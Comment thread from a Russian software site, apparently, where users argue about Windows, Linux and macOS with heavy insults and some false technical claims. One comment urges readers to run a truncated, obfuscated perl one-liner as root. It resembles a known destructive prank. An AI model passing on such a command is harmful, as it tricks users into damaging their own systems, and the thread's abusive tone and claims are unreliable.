Софтодром   

Проект StopLinux опубликовал обширный материал с критикой Linux
Dancey_Girl Dancey_Girl, 16.01.2014 00:55
Вот вы все тут срётесь как ненориальные, оскорбляете друг друга, а у меня такой вопрос: я, девушка которая не понимает и половины ваших слов, смогла бы пользоваться линуксом? Вот чтобы сесть и спокойно пользоваться ноутбуком без нервотрёпки? Времени у меня нету на комп практически... И заметьте что большинство пользователей обладают таким же уровнем знаний как я, даже меньше. Вот я смогу с линуксом просто сесть и написать реферат или отредактировать фотку, без заморочек и лишней траты времени? Интересно, кто-нибудь мне ответит по существу или меня тут даже не заметят?
Next9 Next9, 10.11.2013 20:18
Автор полностью диградировался Виндовсом раз такое пишет, понимаю Линукс ему не осознать и не работает он у него наверное, но ведь на дураков не обижаются. Я например полностью на Линуксе сиже, единственным минусом есть только ограничение софта, и то это поправимо и современем исправится, ну и последняя версия (13,10) чета глюканутая, во всем остальном Виндовс уже просто неможет ничего путнего придумать и конечно же со временем они некому не будут нужны. Хотелось бы отдельно поблагодарить автора за такой бред - молодец много наврал, надеюсь когдато поймеш что Ты не прав, ну или хотябы не полностью.
ЗЫ. Хватит удалять мои сообщения, статью ведь оставили - у ней намного больше нехорошего!
Next9 Next9, 10.11.2013 20:05
Автор полностью диградировался Виндовсом раз такое пишет, понимаю Линукс ему не осознать и не работает он у него наверное, но ведь на дураков не обижаются. Я например полностью на Линуксе сиже, единственным минусом есть только ограничение софта, и то это поправимо и современем исправится, ну и последняя версия (13,10) чета глюканутая, во всем остальном Виндовс уже просто неможет ничего путнего придумать и конечно же со временем они некому не будут нужны. Хотелось бы отдельно поблагодарить автора за такой бред - молодец много ху*ни выдумал иди нах*й, удачно дня!!!
Next9 Next9, 10.11.2013 19:49
Автора просто походу в детстве пингвин укусил вот он и выкручивается всякими мифами. Хотелось бы поправить что ни один из его мифов даже не заслуживает какого либо уважения, понимаю деградация от Виндовса его отупляет, но попробуй как-то хоть что-то выучить, для начала книжку почитай, гляди так и умнее может когда то станешь. А людям мозги запутывать не нужно, ты наверное и в Виндовсе туповат, да ну ладно тебя - "не умных" людей прощают выходя из ихнего состояния.
gerach gerach, 21.10.2013 18:18
хватит пиписками меряться, ну какая разница windows или linux ? по мне лиш бы работало...
bionz bionz, 21.01.2013 08:14
Ужасно не грамотная и преувеличенная критика. Моей первой ОСью был debian 3.1 потому что это была единственная ОСь за которую не надо было платить, вскоре я пожалел об этом, я переустанавливал её ну очень много раз из-за того что постоянно что то ломалось и я не знал как исправить ту или иную ошибку, но с пустя какое то время я научился её более менее настраивать и кое как работать на ней после чего я прочитал что можно сконфигурировать собственное ядро что я и решил сделать после чего я опять пожалел об этом, в итоге сейчас пользуюсь всё темже debian'ом и не чувствую никакого дискомфорта. С пересобранным ядром под моё железо дистрибутив работает идиально без ошибок и лагов и цена этому была всего лишь 3-4 часа работы за компьютером в день(в течении 2х лет). Друзья каждый год переустанавливают свою винду из-за непонятных лагов вроде компьютер мошный а всё равно глючит, в чём проблема никто не знает в итоге всё сносят и поновой... Я мало пользуюсь виндой поэтому ничего про неё сказать не могу, я бы мог её устаноить но после пережитого гемороя с линуксом мне её даже не хочеться устанавливать, уж как то привык к unix. На данный момент дистрибутивы на линуксе гораздо проще чем в 2005 году и работает намного стабильней чем в те времена, можно скачать бесплатный дистрибутив на линуксе и настроить всё самому в отличии от других ОС где всё за вашу денежку вылезано и почему то всё равно глючит.(причину лагов в винде я вообще не понимаю).

Люди, если вы вздумали всерьёз заняться изучением linux то знайте что будет пторачено куча времени и сил, лучше уж 3000 р. потратить чем таким садизмом заниматся.
bugmenot bugmenot, 06.01.2013 01:33
Афтар, я прочитал только 28 ваш высер и понял что это мракобесие и безграматность, а вы мудак, Syllable это тоже linux , ещё один плюсик линуксу в копилку за скорость :3
bugmenot bugmenot, 06.01.2013 01:34
http://distrowatch.com/table.php?distribution=syllable
Rick21 Rick21, 06.01.2013 04:54
дружище, не споря по теме, хочу заметить, что ты сам малость обосрался по части грамотности: на дистроваче лежит _серверный_ syllable (Desktop: No Desktop
Category: Server), который действительно построен на линуховом ядре, но есть ещё Syllable Desktop - система для десктопов, практически полностью совместимая со стандартами POSIX, но ядро у нее _не линух_.

Учи матчасть, иначе, как и сейчас, так и будешь выглядеть в глазах окружающих иванушкой-мудачком.

ЧаВо проекта Syllable: http://web.syllable.org/documentation/FAQ.html

Syllable Desktop is an original desktop operating system.
Syllable Server is a matching small and efficient Linux server.
ruff ruff, 11.11.2012 15:04
Посмотрел дату статьи: 08.07.2009 года, респект, автору! Это же надо, столкнуть лбами поклонников "линуха" и "винды" и по сей день они меряются письками! Три года! За это время можно было бы и ума набраться, и тем и другим, ан нет. Баранячее упрямство, и главное, никому не нужное. Практически с 2000 года сижу на "винде" и на "линухе" (debian и с 2007 года - archlinux), и по сей день, читая подобные статьи, не понимаю, зачем мне кому-то доказывать превосходство той или иной системы. Драчите дальше эту тему, желаю успехов в вашем безнадежном деле!!! :)))
heknt heknt, 30.10.2012 11:36
Существует 2 мнения "ЗА" и "ПРОТИВ" Linux. У каждой стороны свои мнения и предрассудки. Что касается автора данной статьи, я согласен с некоторыми его высказываниями, но в целом, если из его рьяной, гиперболизированной статьи убрать все аргументы, которые он явно преувеличил или даже "преврал", вся статья просто напросто лишается смысла. Почему-то люди привыкли в большинстве своем, когда пишут такие статьи, ориентироваться на людей еще не вылезавших из-за школьной парты, которые считают, что нужно просто пальчиком поманить и у них будет толпа сторонников. Ребят, оставьте тупую гиперболу писателям и желтой прессе. Если ты тут все разложил по полочкам - тогда приводи аргументы, а не свое накипевшее отвращение к Linux'у или точнее к людям пропагандирующим его.
wiedii wiedii, 20.10.2012 14:46
8 лет работал админом
линух не разу не пригодился
alexrussip alexrussip, 09.03.2012 00:13
Я согласен что есть недостатки в линуксе, но это не значит что он не будет развиваться:
Android — операционная система для коммуникаторов, планшетных компьютеров, цифровых проигрывателей, наручных часов, нетбуков и смартбуков, основанная на ядре Linux!!! (Из Вики)
Вот Вам ОС для пользователя и никакой командной строки.
Просто кому-нибудь нужно сделать хорошо настроенную пользовательскую версию Линукс с набором аналогов самых распространенных программ Виндоус...
А для серверов всегда будут на первом месте ОС Linux, FreeBSD, Unix - по той простой причине, что перегрузочная способность Выше... Попробуй настрой под Виндой Web сервер (apache+php+MySQL)
А раз Веб сервера под Unix подобными системами, то выходя в интернет вы используете Линух , который где-то стоит себе и работает!)(пусть и на серверной стороне,но именно к нему поступает ваш запрос и обработанный попадает к Вам в браузер)
Автору спасибо открыл для меня существование ОС Syllable)))
turistovka turistovka, 21.02.2012 18:53
Тот кто уже привык будет и дальше пользоваться.
ryazanov718 ryazanov718, 10.12.2011 14:44
Автор или туповат или дураком прикидывается, виндовоз система платная, в которую миллиарды вложены, а в линукс вложен ум энтузиастов.
Сравнивать винду как платный софт надо с платным софтом - с Мас OS , в которую тоже бабла вложено не мерено.
Мой опыт пользования осей привёл меня к использованию Мак оси, после десяти летнего использования виндовозов от 95-го до семёрки, я уже два года как пересел на Мас и только рад этому.
Все настоящие профи - архитекторы, дизайнеры, музыканты, киношники, фотографы пользуются Маками, зайдите в любое уважающее себя издательство там все работают только на маках.
А вы говорите линукс плох.
Antoshka86 Antoshka86, 10.12.2011 17:27
Mac OS X и линукс вещи совершенно разные. Линукс это собственно лишь ядро для ОС на нем основанных, а в основе Mac OS X ядро Darwin. Хотя это и unix-подобная ос, но отнюдь не линукс. Другое дело Android. Вот в нем действительно ядро линукс
ryazanov718 ryazanov718, 10.12.2011 23:03
"unix-подобная ос" - ноги то растут из одного и того же места.
А разве Андроид не затолкал виндос мобаил за пояс?
unix- он и в африке unix, и у линукса от туда же всё выросло.
Первым я полюбил линукс, и ни за что бы с него не ушёл, если бы не отточеные компы яблочников.
Мак это просто кайф, и он unix-подобная ос, значит "родственник" линуксу, а я люблю линукс!
Я от виндовоза столько горя хлебнул! Не спанные ночи в поисках причин падения и нестабильности, море потерянной информации.
А сколько я телефонных номеров на винмобаил потерял! Да будь они прокляты эти мелкомягкие!
Я из за из продукта себе столько нервов испортил, что у меня есть одно пожелание к этому грёбаному изобретателю виндовоза - Жаль что твоя мама аборт не сделала вовремя, тебя урода родила!
Jorat Jorat, 08.03.2012 02:06
Вам батенька полечиться надо, а то с нервами у вас действительно, беда...
ryazanov718 ryazanov718, 08.03.2012 10:01
Конечно беда с нервами! 10 лет просидеть на виндовозе, это же какие нервы надо!
TOR TOR, 08.03.2012 15:41
дарвин это гуй. учим матчасть.
TOR TOR, 08.03.2012 15:41
ядро в маке бзд.
Antoshka86 Antoshka86, 08.03.2012 15:51
Ну если хочется придраться, то тогда уж XNU а не BSD, так что продолжай учить матчасть
TOR TOR, 08.03.2012 17:18
в макаке используется ядро, содержащее код написанный самой Apple и код, полученный из операционных систем NeXTSTEP и FreeBSD. фряха и некстеп, сечешь, знаток а? ядро действительно кличеццо XNU, что даже переводиццо как «Xnu is Not Unix» — «Xnu — не Юникс», но в котором используются все стандартные сервисы BSD. абсолютно все возможности Unix в Mac OS X доступны через консоль.
Antoshka86 Antoshka86, 08.03.2012 18:57
Что не делает его ядром BSD
ryazanov718 ryazanov718, 10.12.2011 14:29
Автор забыл добавить ещё один пункт :-
"Почему у windows не будущего?"
Ответ прост - Потому что есть Mac OS X стремительно набирающая популярность.
ryazanov718 ryazanov718, 10.12.2011 14:31
А ведь Mac OS X это тоже ветка линукса, только ветка золотая!
Antoshka86 Antoshka86, 10.12.2011 17:20
Наглая ложь. В основе Mac OS X отнюдь не ядро линукс.
ryazanov718 ryazanov718, 10.12.2011 23:12
unix-подобная ос это тоже линукс, только мак за деньги очень сильно "вырос", если в мандриву или убунту вложить столько же бабла как в виндовоз, то пользователи и слова то "виндос" знать не будут.
Виндовоз держится за счёт игр и дешёвого железа, хоть и работает криво.
Для пост советской босоты компы яблочные оказались не по карману, вот все и сели на дешёвые РС, а на РС тогда был виндовоз лучший выбор, хоть и дерьмо.
А нормально живущие люди в той же америке всю жизнь на Маках сидели.
Я видел в интернете фотки какойто презентации майкрософта, и там было акцентрировано внимание на то, что ди джей работает через макбук. Вот вам яркий пример от профи, не думаю, что майрософт на презентацию лоха пригласил.
Antoshka86 Antoshka86, 10.12.2011 23:34
unix-подобная ос это unix-подобная ос, а не линукс. Не надо тут бредовые утверждения выдавать. Маки хороши, относительно. Да они удобны и красивы но в тех же Штатах их число все равно невелико в сравнении с PC и главная причина тут в том что Mac OS X нельзя купить отдельно от компа. Но и стабильность работы системы достигается не в последнюю очередь благодаря этому. Когда есть достаточно ограниченный список основных компонентов системы, то заточить под него ОС проще. А линукс навсегда останется говном если этот зоопарк не объединят в единую ОС, ну может быть в парочку ОС на базе одной системы пакетов. Пока каждая компашка клепает что то свое он так и будет полным дерьмом.
ryazanov718 ryazanov718, 08.03.2012 10:09
Как Вы например собираетесь систему управления лифтами или пожарной сигнализации делать на виндосе? У меня в доме корейские лифты управляются линуксом, а вот пожарка, которая постоянно глючит работает под виндой, это какой то Российской фирмы выкидыш, помучившись год с этой системой наш ЖЭК сейчас её демонтирует и ставит немецкую, которая управляется линуксом. Без линукса никак в этой жизни, все спутниковые рессиверы работают под линуксом и вообще оглядитесь вокруг, линукс на каждом шагу! ВиндосФоне 7 умирает и упал до 2%, а вот андроид (линукс) стремительно набирает популярность. Факт?
TOR TOR, 08.03.2012 11:58
вранье. макось покупаеццо и отдельно от компа.
Antoshka86 Antoshka86, 08.03.2012 15:53
Угу только вот это скажем так версия для обновления, т.е. предназначена для установки на компы Apple где собственно уже была какая то MacOS
sfc42 sfc42, 10.03.2012 05:03
и вообще, господа мы отвлеклись от темы...а что скажет муфтий? и когда, наконец, рухнет проклятый режим?
sfc42 sfc42, 10.03.2012 04:45
на мой непрофессиональный имхо, винда что то типа английского языка...for all...isn't it?
TOR TOR, 08.03.2012 15:43
практически такое-же. лицензия другая. шиндовз гавно для всех, кроме тех, кто играеццо - тем действительно не стоит пробовать что-то иное.
TOR TOR, 09.03.2012 00:48
никогда мак не был веткой линукса. корни мака - кернел бсд.
Jorat Jorat, 08.03.2012 02:04
А ничего, что Mac OS работает только на Маках, не? Или у компов кроме Маков тоже нет будущего?
ryazanov718 ryazanov718, 08.03.2012 10:22
Да у компов РС нет будущего, лет через 5-10 они полностью уйдут с рынка, возможно останутся в нищих странах у бедноты, ну и конечно в России. Все уважающие себя пользователи уйдут на планшетники типа iPad, моноблоки типа iMac. Вчера не презинтации iPad, так и было сказано:- наступает эра Post-PC и это факт.
Виндовоз умрёт, а линукс останется на всегда, в планшетниках, телефонах, лифтах, и многой другой бытовой техники. А программеры будут постоянно из него лепить десктоповую систему.
За два года на Макинтоше, я не потерял ни одного файла, ни разу не видел ничего подобного "синему экрану смерти". А сколько суперовского софта на Маки сделано! Весь лучший софт пишется под Мас, а потом делается под виндос.
Как ни крути Мак рулит.
skripter skripter, 18.10.2011 02:28
Мдддааа... автор постарался доказать что виндовс лучше линукса, но все же это дело вкусов. я уверен что все кто говорят что линукс гавно, тупая и глючная хрень, то это именно те кто начитавшись таких статей делают выводы об этой системе, даже если они и пользовались, но не очень долго что бы понять и разобраться. да раньше было тяжело, консоль все дела, но сей-час все изменилось, к тому же поклонники виндовс не хотят уходить с нее(да никто и не заставляет, можно использовать две ос на компе и в свободное время изучать линукс)просто не представляют жизни без платного MS Office, кучи красивых современных игр и соответственно драйверов для их работы, а так же они просто хотят видеть в ней интерфейс виндовс и дурацкую кнопку пуск. Мне например за 4 дня хватило нервов изучить эту систему и она мне очень сильно понравилась, особенно на моем 3g модеме в виндовс приходилось постоянно запускать всякие коннект мэнеджеры(перепробовал кучу прошивок, но все глючные), когда на линуксе интернэт работает уже во время установки и качает последние версии пакетов, а уж при использовании после установки никаких глюков и всегда стабильная связь.
Guilby Guilby, 28.09.2011 22:03
Автор странноват. Пользуюсь Linux около 10 лет. Очень удобная сисета. Большеству народу, который смотрит фильмы, слушает музыку, лазиет по Сети совершенно до фени какая ОС у него стоит. Секретарям тоже. Сам работаю с графикой и разнообразного софта для работы уйма. Под Windows зачастую танцев с бубнами хватает.
TOR TOR, 08.03.2012 15:44
автор не просто странноват, - он неадекватен и необъективен.
Ferdaloost Ferdaloost, 08.03.2011 13:25
Да работайте вы там хоть на абакусах, мне далеко по-сараю. Хочешь узнать человека - дай ему власть не на долго... Ему влом поставить на рабочий комп проостую читалку, ведь наверняка не единичный случай. Ему не влом отзвониться в провинцию и задать пропи@дон админу-красноглазику, ему наплевать на девчонку что будет поновой набивать базу ( скорее всего в свое сверхурочное время) чтобы этот упырь только смог открыть документ. Не сомневаюсь что уж админ то красноглазик найдет множество способов переформатировать док чтобы не мучить ту бедную девчонку, а 36 летний маскофскийниипацаспецалист блюдет кашрут на своей рабочей машине
judas judas, 08.03.2011 13:57
воооо, хоть и хамовито но по теме.
---------
Да, может я упырь и лох, может я и хреновый руководитель и дурак по жизни - не отрицаю, но извините уважаемый, самодеятельность по поводу Линукс и Виндовс разводите вдома (это я не Вам это я линуксоидам). Есть стандарт центарлизованной передачи информации , подстаривайтесь под этот стандарт .
По поводу прои...дона админу низшего уровня. Ответ прост. Да мне настрать на тех админов пусть хоть в МасОс-е клеапают док, хоть в "Слове и деле" под 3-й дос, на выходе с ихней кухни, должен быть док который могут прочитать большинство конечных потребителей.
--------
Теперь по поводу поста на который Вы так активно реагируете.
Дело в том что ситуация которую я описал с согласованием не связана с МО никаким боком. Согласно закона на территории моего госсударства, все строения выше 50 метров от земли согласовываются ВСЕМИ!!! (гражданские частные государственный, иностранные и.т.д) учтреждениеями с МО в частности с сектором Авиация (для безопасности полётов). Ведь граждане могут же построить вышку прямо на посадочном курсе у аэродрома.
Это общая картина чтобы Вы понимали в чём суть.
Вот и ситуация.
МО сидит на Винде как и подавляющее (97.5%) число нормальных эксплуатантов ПЭОМ, а некоторые организации (не с МО такие как у автора того поста которые подсадил всех на КМС) сидят на Линуксе.
Естественно что ИТ-шник больной линукоикозм или линуксофренией, считает что он и его платформа это всё а остальные говно которое должно под чтото подстроится и присылает нам ху* знает что для согласования.
Вот и казусы подобные возникают.
ВЫВОД:
Господа ЛИНУКСОФРЕНИКИ! дома маструбируйте хоть в ДОСЕ на работе можете тоже но поймите что 97.5% остальных срать хотела на вашу маструбацию и самоутверждение, они срать хотели на ваши форматы данных какие бы они крутые не были. Если хотите выжить в мире безработицы и дефецита рабочих мест подстраивайтесь под большинство.
sfc42 sfc42, 08.03.2011 16:22
аминь
TOR TOR, 08.03.2012 15:48
ты забыл про себя еще добавить - онанист. мне вообщем-то насрать на подобные выводы (сам пользуюсь линукс около 10 лет уже, есть 3 макбука, есть на отдельном винте и семерочка максимальная лицензия естесстно). как пользователь заявляю, - кому на чем удобно, тот и должен на том работать. срачи не нужны априори.
Ferdaloost Ferdaloost, 08.03.2011 01:35
Не ну это чёс, это явно не программист с 20 летним стажем - скорее чуток наблатыкавшийся школяр выпендривается. А вопрос про лизунписи как-то обошел стороной, странно.
Ferdaloost Ferdaloost, 07.03.2011 21:59
Ну не знаю, если министерство обороны пользует сугубо продукт потенциального врага - 3.14*детс всякой обороне. Акуеть у нас защитнеги - языков мы не знаем, учиться мы не хотим... (мат-перемат)
judas judas, 07.03.2011 22:18
ВОПРОСЫ ПО ВАШЕМУ ПОСТУ:
1. семейство Консольно-матрубационных систем создано наверное в городе Герое Москва российскими программерами на базе ПК Ленинград-2 и развивается до сегодняшнего дня ?
2. сравните Windows XP SP2 (русская локализация) и любую КМС (не считая недавно выср... Росинку) по языку на котором написаны справочные системы, пункты меню, диалоги настройки и так далее. Какая ис операционок более адаптированна под вражескую а какая под славянскоязычную?
-------------
По поводу обороны. Довожу до Вашего сведенья что всякая ОС которая используется операторами и пользователями оборонного ведомств ОБЯЗАТЕЛЬНО!!! должна пройти тщательную сертификацию (включая в спецорганах в том чиисле). И знаете что смешно господин Ferdaloost ? Та в том что в неашей стране к счастью сертификацию не прошла ни одна консольно-матсрубационная система по простой причине - комплект поставки может быть пересобран любым линуксоидом "под себя", что не исключает наличие человеческого фактора из числа уволенных в запас бывших сотрудником моей организации, а также других силовых структур.
А вот пересборка ОС типо ВИндовс - невозможна. То есть ситуация:
-------
Имеется сервер с ОС на котором хранится некая инфа внутреннего циркулирования но на серваке есть выход в интерент (у нас оно сеть Днепр называется)
Если Сервак сидит на КМС то линуксофреник который администрирует сервак, перед дембелем может спокойно "пересобрать ядро" таким образом что потом через инетернет может лазить и качать любую инфу с сервака. А безопрасность поттиво человеческого фактора в таком случае с Виндой - решается очень просто - сносится ВИнда и ставится по новому
ryazanov718 ryazanov718, 10.12.2011 14:59
Ну ты отмочил! В винде встроен сбор информации о пользователе, и если ваша винда подключена к интернету то НАТОвцы имеют свободный доступ к вашему компу. Это сто раз уже говорилось и писалось.
Вот вы пищите:- "Если Сервак сидит на КМС то линуксофреник который администрирует сервак, перед дембелем может спокойно "пересобрать ядро" таким образом что потом через инетернет может лазить и качать любую инфу с сервака." А зачем пароль рута давать кому попало?
А как на счёт того полковника из генштаба России, который сдал десяток наших агентов в Штатах и свалил за бугор?

Я вам отвечу - я на виндосе тебе сделаю всё тоже самое ещё проще, не переписывая ядро. Вернее уже там всё сделано, только надо знать как это запустить.
-" с Виндой - решается очень просто - сносится ВИнда и ставится по новому" - а что линукс не переустанавливается?
И потом, я не разу не слышал, и не видел что бы секретные или сов.секретные документы хранились на компах, такое только в кино быват.
sfc42 sfc42, 08.03.2011 01:48
вы чо блин такие трудные,до МО добрались,)какие то мифические дембеля,красные кнопки...вас не спросили на чем им сидеть)делайте свою работу...вот бля путин на mersedese ездит...а на чем ему ездить,хочет и ездит,кого епет...меряетесь письками,и мерьтесь хоть на гавно изойдите,так надо еще МО,подтянуть высказать свое веское мнение и выдать ценные рекомендации,умище продемострировать)...оборона,потенциальный враг...это да...никто вас винды не лишает и linux в ассортименте...enjoy
judas judas, 08.03.2011 11:32
чем это мы трудные ? мы такие же обычные рядовые пользователи ПЭВМ как и все, и она ПЭВМ нам нужна для решения задач которые ставят нам сверху, а не для изучение структуры ОС и консоли. Военные они привыкли работать с красной кнопкой которая выполняет все желания, и подсадить на КМС министерство обороны такая же утопия как рай на земле.
Ferdaloost Ferdaloost, 07.03.2011 20:48
Для иудаса (уж больно вы смахиваете на КОМПЬЮТЕРЩИКА, он же ЛИЗУНПИСИ): если ваше "госучреждение верхнего уровня" контора вся из себя такая основная, и не имеет чем открыть документ формата внедряемого нашим преподобным правительством, а на своем ли месте ваша контора? может пора разгонять такие шараш-монтаж КЕМ?
judas judas, 07.03.2011 21:13
Давайте разгоняйте Ferdaloost, Министерство Обороны можно разогнать только при капитуляции )
это отступление
--------------
Довожу до Вашего сведенья что в моей стране (см. профиль мой указана) МО в частности перешло на официальную Винду !!! которая централизовано закупается за бюджетные деньги.
Теперь по поводу форматов. Если даже не было бы официальной Винды а ломанная как в многих учреждениях, то извините уважаемый, я бы не ставил средство для маструбации к себе на рабочий комп по простой причине:
Я на работе занимаюсь тем что от меня требуют а не "дрочу" консоль и ищу пути для самоутверждения.
TOR TOR, 08.03.2012 12:09
я вижу только одно, - у юдаса болезненное пристрастие к онанизму. и все.
TOR TOR, 09.03.2012 23:58
МО можно оставить, иудаса выгнать, - как тебе такой вариант, а?
judas judas, 07.03.2011 16:01
Хозяину статьи!
Почему многие мои посты не остаются в качестве ответов ?
Благодарю
sfc42 sfc42, 07.03.2011 16:33
помедленней, пожалуйста...
я записываю...©)
judas judas, 07.03.2011 21:20
sfc42 , а Вы автор поста? )))
sfc42 sfc42, 07.03.2011 05:59
а чего вы собственно разорались?мастурбируют они или на пятки наступают...имеют право,взрослые люди и возможно не самые тупые,лично я рад что существует альтернатива,прогресс,конкуренция да и мастурбируют они за свой счет...не было бы всяких Oper сидели бы на IE6(ну возможно на IE6u(усовершенствованый))размером с Nerу))весна покажет кто где чем занимался)
judas judas, 07.03.2011 11:39
Уважаемый sfc42!
Так вот, суть моего поста в том, что - "нравится тебе твой замкнутый мир-радуйся" и не надо агитировать и доказывать что это круто остальной нормально-мыслящей части населения (98%)
Никто и ничего против них не имеет. Каждый человек с моральным и психологическим диагнозом имеет место на существования не исключая меня. Только проблема вот в чём:
Господа линуксоиды, не нужно тут расказывать что Вы занимаетесь благим делом. Кроме Вас самих никто Вас никогда не поймёт , а ваше число это всего лишь показатель количества людей с математическим и логическим составом ума от природы, которые в раннем возрасте начали страдать психическими отклонениями и не больше.
sfc42 sfc42, 07.03.2011 13:08
да мне как то никто ничего особо не доказывает...так,слышал что есть жизнь за пределами windows, пробовал--вполне...быстро,легко,нормально...в принципе все работает,конечно после винды не все привычно,чего то не хватает,возможно можно найти и разобраться.но мне как никто нечего особо и не обещал и о консоли я вообще не в курсе,ребята работают --флаг им в руки,результаты есть,тема в работе,что за истерики?по сути)?..агитируют?все агитируют...100м vs 3ГБ впечатляют,скорость опять же...
windows конечно rules но не значит что она уж сильно лучшая или forever .есть в конце концов iOS, тоже вариант.просто не у всех есть выбор.и желание выбирать.короче,не нравиться не ешь)и нечего агитировать))
judas judas, 07.03.2011 11:43
Не заметил ключевое слово
ЦИТАТА: ... существует альтернатива,прогресс,конкуренция...
sfc42, лично я думаю что Вы взрослый и здавомыслящий человек. Когда Вы писали слово "конкуренция" Вы о чем думали уахахахахах ))))
sfc42 sfc42, 07.03.2011 14:21
я думал о том что на винде свет клином уже не сошелся,и линуксоиды и Apple даже одним своим существованием вызывают шевеление(движуху)) в Microsoft.
а % это статистика,ВАЗ возможно до сих пор в лидерах в РФ)да и nokia пару лет назад пёрла и фонтанировала...
и вообще,никто не хоронит винду и не предлагает Вам,взрослым и здравомыслящим,да и Нам, мастурбироать консоль.
judas judas, 07.03.2011 14:30
ЦИТАТА: никто не хоронит винду
sfc42,для того чтобы коменты к теме были жарче, дам контингенту поражённому вирусом "ЛИНУКСОФАГ" (придумал сам) пищу для возможности посамоутверждатся перед нормальными юзерами (я о Виндовсо-ориентированной части) Якобы похороны "винды":
http://biz.cnews.ru/news/top/index.shtml?2011/02/11/427101
http://news.bcm.ru/doc/14970
Вот это возбудит Линуксоидов. Такие новости им как бальзам на душу. Вот сча они начнуть тут расказывать где начало конца.
sfc42 sfc42, 07.03.2011 15:05
я полагаю что trueвые линусоиды вряд ли обратят на это внимание,что им Стив Баллмер.им есть чем заняться,консоль и все такое)они и так самодостаточны)
judas judas, 06.03.2011 17:59
Молодец автор, уважуха и респект ! Так держать, линуксоидов на мыло.
Теперь по сути
-----------
ЦИТАТА: Линукс наступает виндовозу на пятки
Харэ бредить уважаемый!!! Посмотрите сами кто куда наступает, уступает, отсупает и "попускает" http://trends.openstat.ru/global-statistic-os
Я в глубоком шоке от людей которые слепо верять в царствования своих замкнутых мирков Линуксоида! Очнитесь господа! Вы в реальном мире а не мире бреда, коммунима, рая, тотального Линукса и.т.д как хотите так называйте. НИКОГДА это консольно-маструбирующая система не сможет конкурировать с Виндой ! Если взять эти неполные полтора % юзеров которые сидят на Линуксе и провести между ними опрос типо:
Кто Вы есть на самом деле:
1. рядовой юзер
2. продвинутый юзер
3. программер
4. убеждённый Линуксоид
То повертье мне п.1 будет почти 0, п2. наберёт не более 5% п3 и п4 приблизительно 1:2. Как сказал автор статьи, пользователи Линукса вполне продвинутые в ИТ люди и далеко не продвинутые юзеры, а программеры и опытные ИТ-шники у которых просто, очень рано поехала крыша (смотрите фильм "Игры разума")
Ребята линуксоиды очнитесь!!! Маструбировать консоль это не круто, это вы думаете что это круто, а реально это бесполезная трата времени и ячеек головного мозга в котором хранятся все єти команды консоли, их параметры и комбинации !!!
Заполните голову чем то полезным и приносящим реальные плоды а не постоянной пересборкой ядра для самоутверждения что типо "я крутой я тоже умею сам пересобрать ядро Линукс"
fedorr fedorr, 01.03.2011 09:07
Вдобавок, в использовании консоли заключается серьезная опасность. Попробуйте запустить следующий скрипт с правами root.

perl -e '$??s:;s:s;;$?::s;;=]=>%-{
judas judas, 06.03.2011 18:47
Фёдор , скажите если не секрет, что это perl -e '$??s:;s:s;;$?::s;;=]=>%-{ делает? Самому интересно )))
black547 black547, 14.12.2010 10:08
все станет на свои места когда уважаемые юзеры будут платить свои кровные деньги за Microsoft Windows и т.д. и т.п. Вот тогда и посмотрим Windows vs Linux
judas judas, 06.03.2011 18:45
black547, поверьте мне лучше заплатить за платформу и не думать о ней никогда, а выполнять задачи для которой покупается ПЭВМ, чем сидеть в постоянной пересборке непонятно чего.
Платформа нужна не для самоутверждения, а для фундамента. Она есть площадкой на которой строятся дома. Это была ассициация:
площадка - ОС, дома - набор программного обеспечения и данных на которых:
- 80% операторов ПЭВМ зарабатываю деньги
- 15-17% используют для развлекательных целей и
- 3-5 процента для собственного самоутверждения.
Вот Вам реальная картина кто какую ОС использует.

Вы можете оставить краткий комментарий к этой статье.
Обратите внимание:
  • Комментарий должен быть написан на русском языке.
  • Комментарии с ненормативной лексикой будут удалены.
  • Запрещено указывать интернет-адреса (URL).

Чтобы оставить комментарий, необходимо авторизоваться.

Обратите внимание:
  • Запрещено обсуждение вопросов, касающихся кряков, серийников и т.п.
  • Запрещено указывать ссылки (URL).
  • Комментарий должен быть написан на русском языке.
  • Комментарии с ненормативной лексикой будут удалены.
5088


Главные новости дня:

Топ-20 лучших бесплатных программ для компьютера на Windows

Приложение Т-банка вернулось в App Store под названием Freelance Case

Минцифры не будет применять централизованный сбор данных россиян

Минцифры: ИИ может заменить половину чиновников

«Яндекс» объявил о покупке службы доставки Boxberry

Топ-15 бесплатных антивирусов для компьютера на Windows


Топ-10 лучших бесплатных программ для Windows

ТОП-10 Аудио, видео

K-Lite Codec Pack Full

7/8/10/11
Разработчик: K-Lite
Загрузок: 5940206

Бесплатная

K-Lite Codec Pack Full — набор кодеков и инструментов для проигрывания аудио и видео практически любых форматов


ТОП-10 Система

CCleaner

7/8/10
Разработчик: Piriform Ltd
Загрузок: 2903627

Бесплатная

CCleaner — бесплатная программа для очистки системы: удаления истории просмотра сайтов в браузерах, временных файлов, а также для безвозвратного удаления данных


ТОП-10 Загрузка файлов

uTorrent

7/8/10/11
Разработчик: BitTorrent
Загрузок: 2462735

Бесплатная

uTorrent — компактный BitTorrent-клиент с поддержкой одновременной загрузки сразу нескольких файлов, настраиваемой полосой пропускания, небольшим использованием памяти и т.д.


ТОП-10 Мультимедиа

DAEMON Tools Lite

7/8/10/11
Разработчик: Daemon-tools
Загрузок: 1503472

Бесплатная

DAEMON Tools Lite — эмулятор CD/DVD-приводов, относительно маленький по размеру, но мощный по возможностям


ТОП-10 Графика и дизайн

Foxit Reader

7/8/10
Разработчик: Foxit Software
Загрузок: 1238429

Бесплатная

Foxit Reader — быстро работающее приложение для просмотра и печати документов формата PDF, не требующее наличия Adobe Reader


ТОП-10 Загрузка файлов

BitTorrent

7/8/10
Разработчик: BitTorrent
Загрузок: 516473

Бесплатная

BitTorrent — официальный клиент пиринговой сети, нацеленной на возможность загрузки файлов большого размера


ТОП-10 Аудио, видео

KMPlayer

7/8/10/11
Разработчик: KMP Media Corp.
Загрузок: 3165522

Бесплатная

KMPlayer — медиаплеер с поддержкой проигрывания всех популярных видеоформатов и гибкой настройкой параметров просмотра видео


ТОП-10 Загрузка файлов

qBittorrent

7/8/10
Разработчик: Gbittorrent Team
Загрузок: 28992

Бесплатная

Приложение файлообменной сети BitTorrent со встроенным поисковым движком, поддержкой Unicode, Drag'n'Drop, возможностью скачивать только указанные файлы, а не весь торрент, работой через прокси и т.д.




Программы | Сайты для детей | Рейтинги | Статистика | Авторам | Рассылки
Copyright © 1999-2025 Softodrom.ru
Реклама | О проекте | О перепечатках | Пользовательское соглашение | Политика конфиденциальности | Карта сайта